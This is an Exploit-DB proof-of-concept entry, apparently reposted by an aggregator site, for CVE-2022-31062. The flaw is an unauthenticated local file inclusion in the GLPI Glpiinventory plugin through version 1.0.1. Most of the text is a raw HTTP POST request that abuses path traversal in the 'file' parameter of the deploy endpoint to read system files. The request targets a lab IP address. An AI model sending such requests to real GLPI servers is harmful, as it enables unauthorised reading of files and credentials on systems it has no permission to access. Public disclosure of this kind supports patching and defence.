[webapps] GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
2023-4-3 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:13 收藏

# ADVISORY INFORMATION
# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  
# Date of found: 11 Jun 2022
# Application: GLPI Glpiinventory <= 1.0.1
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi-inventory-plugin
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31062

# PoC
POST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
            

文章来源: https://www.exploit-db.com/exploits/51230
如有侵权请联系:admin#unsafe.sh